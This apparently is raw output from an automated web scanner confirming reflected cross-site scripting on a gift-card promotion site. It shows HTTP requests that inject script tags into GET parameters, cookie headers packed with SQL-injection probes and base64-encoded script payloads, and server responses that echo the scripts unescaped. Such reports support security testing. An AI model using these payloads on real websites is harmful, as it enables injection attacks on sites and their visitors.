Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:05:47 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830cbc9c5ayg5;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--></style></script><script>netsparker(0x0001BF)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle">$250 in McDonald's&reg; Arch Cards&trade;</span> <br />
<span style="margin-left: 30px;"><img src="http://i.pcp001.com/g/archcard1_165x150.gif" alt=""></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $250 in McDonald's&reg; Arch Cards&trade;, start by completing any 2 of the Silver offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001BF)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 2 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-ic_3group_group1&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift='"--&SID=f05c7ce946bc38d8bfa6b839a4d56265></style></script><script>netsparker(0x0001BF)</script>&user_gift_id=332549389&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=29617&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=29617','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET "><script>alert(9)</script>
promotion_id GET 2192
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=%22%3E%3Cscript%3Enetsparker(9)%3C/script%3E&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:02 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830da3534bgzp;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id="><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $50 Gift Card.
</td></tr></table>
</div>






<div id="hdbot">
<div id="stepArea3"><span class="fillout">Congratulations</span></div>
</div>
</div>

<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div class="spacer45">&nbsp;</div>
<div id="guest-cardarea">


<table width="790" border="0" cellpadding="8" cellspacing="8">
<tr>
<td width="250">

<span class="gifttitle"> $50 Gift Card</span> <br />
<span style="margin-left: 30px;"><img src="http://www.theuseful.com/media/freegiftcard_reserved_287x180.gif" width="200" height="126"></span></td>
<td width="370" valign="top">
<div class="spacer15">&nbsp;</div>
<div class="spacer15">&nbsp;</div>
<img src="http://i.pcp001.com/t/9794/shiptitle-box.jpg" width="174" height="29" />
<div style="margin-left: 30px;">
<p></p>
<span class="font11">You will have a chance to confirm<br />
your address prior to shipping.</span>
</div>
</td>

<td width="150" valign="top"><br />
<span class="font11">
Congratulations, ! To qualify for your free $50 Gift Card, start by completing any 6 of the offers listed below!</span>





</td>
</tr>
</table>

</div>
</div>

<!-- Content Begins -->
<div id="content">
<table width="95%" border="0" cellspacing="0" cellpadding="5" align="center">


</table>
<div>


<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tr>
<td align="left" width="40%" valign="top">
<div id="blue_previousbutton1">
<span id="ic_link_previous_1">
<a href="/ups.htm?path=p.prize.prepop&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" style="width: 134px; height: 75px;" border="0"></a>
</span>
</div>
</td>
<td align="right" valign="top">
<table width="100%" border="0"><tr><td width=360 NOWRAP><span class="buttontxt" id="buttontxt1" >After You've Completed 6 Offers</span></td><td>
<div id="blue_nextbutton1">
<a href="/ups.htm?path=p.prize.prepop-reg-cc_gift&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=&SID=f05c7ce946bc38d8bfa6b839a4d56265"><script>netsparker(9)</script>&promotion_id=2192&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3" target="_blank" onClick="hp_cmd=0;x_cmd=0;" ><img src="http://i.pcp001.com/t/7356/pix.gif" border="0" style="width: 207px; height: 88px;"></a>
</div>
</td>
</tr>
</table>




</td>
</tr>
</table>



</div>
<br><br>
<br><br>


<!-- DISCLAIMER START -->
<div id="disclaimer_container">
<p>
<!--BeginField:Disclaimer-->
You are required to complete at least 2 Silver, 2 Gold and 2 Platinum Sponsor Offer(s) above and must satisfy all <a href="info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Program Requirements</a> to qualify for your gift including: not cancelling your participation in more than a total of 2 Sponsor Offers within 30 days of the Sponsor Offer Initial Transaction Date (the Cancellation Limitation). Promotion <a href="info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200&SID=f05c7ce946bc38d8bfa6b839a4d56265#prog_req" TARGET="_blank" onClick="window.open('info.htm?tp=tos&promo_name=2192name&gift=71&catalog_id=13200#prog_req','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms and Conditions</a> prevail over Sponsor Offer terms and conditions. Limit one gift per household per year.
<br/><br/>
For credit card offers, you must activate your card by making a purchase, transferring a balance, or making cash advance; for satellite tv offers you must have the product installed.
<br/><br/>
We are not endorsed, sponsored by or affiliated with above trademarks, or any other merchants listed above. Such terms are registered trademarks of their respective owners.
<!--EndField:Disclaimer-->
</p>
<p align="center">
<!--BeginField:Links--><A HREF="/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/redeem.htm?promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Gift Redemption</A> - <A HREF="/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=faq&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">FAQ</a> - <A HREF="/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=privacy&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes ,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=450');return false;make_x_win=0;">Privacy Policy</A> - <A HREF="/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=tos&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Terms &amp; Conditions</A> - <A HREF="/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/suppress.htm?user_ref_id=90563525&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Unsubscribe</A> - <A HREF="/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71&SID=f05c7ce946bc38d8bfa6b839a4d56265" TARGET="_blank" onClick="window.open('/info.htm?tp=con&promo_name=2192name&catalog_id=13200&gift=71','_blank','resizable=yes,scrollbars=yes,toolbar=no,menubar=yes,width=550,height=400');return false;make_x_win=0;">Contact Us</A><!--EndField:Links-->
</p>
<p align="center">
<!--BeginField:Copyright-->
Copyright &copy; 2009 Your-gift-zone. All rights reserved.
<!--EndField:Copyright-->
</p>
</div>
<!-- DISCLAIMER END -->





</div>
<!-- Content ENDS -->



</BODY>
</html>



- /ups.htm

/ups.htm CONFIRMED

http://your-gift-zone.com/ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_..

Parameters

Parameter Type Value
path GET p.prize.prepop-reg
user_pin_id GET 200492244
pin_key GET 706853
user_ref_id GET 90563525
gift GET 29617
user_gift_id GET 332549389
promotion_id GET '"--></style></script><script>alert(0x0001C9)</script>
promo_name GET 2192name
catalog_id GET 13200
ups_ref GET cg
remoteRef GET 3_4_0_5068_0
sendroikwd GET 3
return_url GET 3
tmp_sequence GET 6924-11079-6839-10131-6166-10237-10231-10284-10233-10292
page_list GET li_sr_sm
short_ic_path GET 3
SID GET f05c7ce946bc38d8bfa6b839a4d56265

Request

GET /ups.htm?path=p.prize.prepop-reg&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001C9)%3C/script%3E&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_list=li_sr_sm&short_ic_path=3&SID=f05c7ce946bc38d8bfa6b839a4d56265 HTTP/1.1
Referer: http://your-gift-zone.com/ups.htm?user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&path=p.prize.prepop-reg-int&page_tmp_id=9&promotion_id=2192&promo_name=2192name&catalog_id=13200&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&page_tmp=&ups_ref=cg&sendroikwd=&raf_ad_id=&remoteRef=3_4_0_5068_0&return_url=&short_ic_path=&SID=f05c7ce946bc38d8bfa6b839a4d56265&page_list=li_sr_sm
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: your-gift-zone.com
Cookie: CHAR(109)=; CHAR(97))=; 0x3a=; CHAR(97)))=; TlM3NzU0NTYxNDQ2NTc1=; 2))--=; 1=; 1))=; 0)>255)=; 0)=1; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMTM2KTwvc2NyaXB0Pg==; 0)>0--=; 0)<255--=; 0)>255--=; 0)>25--=; 0)>0=; 0)<255=; 0)>255=; 0)>25=; JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwMUFGKTwvc2NyaXB0Pg==
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 27 Apr 2011 15:06:05 GMT
Server: Apache
X-Powered-By: PHP/5.0.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Set-Cookie: track_cookie=4db830dd2a7e1o90;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.theuseful.com;,promo_name_cookie=2192name;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_user_pin_id=200492244;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_pin_key=706853;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;,c_email_key=063756462f49f8c46ec5bc4e60bb02b1;expires=Friday, 16-Jan-2037 00:00:00 GMT;path=/;domain=.your-gift-zone.com;
P3P: CP='CAO DSP COR CURa OUR IND ONL UNI NAV INT CNT STA PRE' policyref='http://www.theuseful.com/w3c/p3p.xml'
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Your-gift-zone</title>
<link rel="stylesheet" href="http://i.pcp001.com/t/9533/regpath3_03.css" type="text/css" media="all">
<link rel="stylesheet" href="http://i.pcp001.com/t/9673/red4.css" type="text/css" media="all">
<style>

#ic_link_previous_1 {
display:none
}
.justcenter_1{
text-align: center;
}

.justcenter_2{
float: right;
}

.justcenter_3{
float: right;
}




div.spacer{
height:40px;
*height:60px;
font-size:40px;
*font-size:60px;
}



#details {
display:none;
position:absolute;
background-color:#FFF;
width:300px;
z-index:2;
padding:5px 10px 10px 10px;
border:1px solid #000;
font-size:12px;
color:#000000;
text-align:left;
font-family: Arial, Helvetica, sans-serif;
font-weight:normal;
text-decoration:none;
}

#details a {
color:#0000FF;
}
</style>

<script language="javascript">
function showD(id) {
document.getElementById(id).style.display = "block";
}
function hideD(id) {
document.getElementById(id).style.display = "none";
}
</script>

<SCRIPT>
var x_cmd=1;

function x_win(){
if(x_cmd==1){
x_win=window.open('/ups.htm?path=p.prize.prepop-reg&mode=exit&exit_num=&user_pin_id=200492244&pin_key=706853&user_ref_id=90563525&gift=29617&user_gift_id=332549389&promotion_id='"--></style></script><script>netsparker(0x0001C9)</script>&promo_name=2192name&catalog_id=13200&ups_ref=cg&remoteRef=3_4_0_5068_0&sendroikwd=3&return_url=3&tmp_sequence=6924-11079-6839-10131-6166-10237-10231-10284-10233-10292&SID=f05c7ce946bc38d8bfa6b839a4d56265','_blank','top=0,left=0,screenX=0,screenY=0,scrollbars,width=550,height=500');x_win.focus();
}
}

function changeFontSize()
{
return;
var text = document.getElementById("phrase").innerHTML;
var fontSize = -1.75 * (parseInt(text.length)) + 90;
document.getElementById("phrase").style.fontSize = fontSize + 'px';
return;
}


</SCRIPT>
</head>

<BODY onLoad="changeFontSize();" onUnLoad="x_win();" >
<div id="hdrContentOffers">
<div id="header">
<div id="hdtop">
<table width="750" height="100%"><tr><td class="mainHdr">
Receive Your FREE $250 in McDonald's&reg; Arch Cards&trade;.
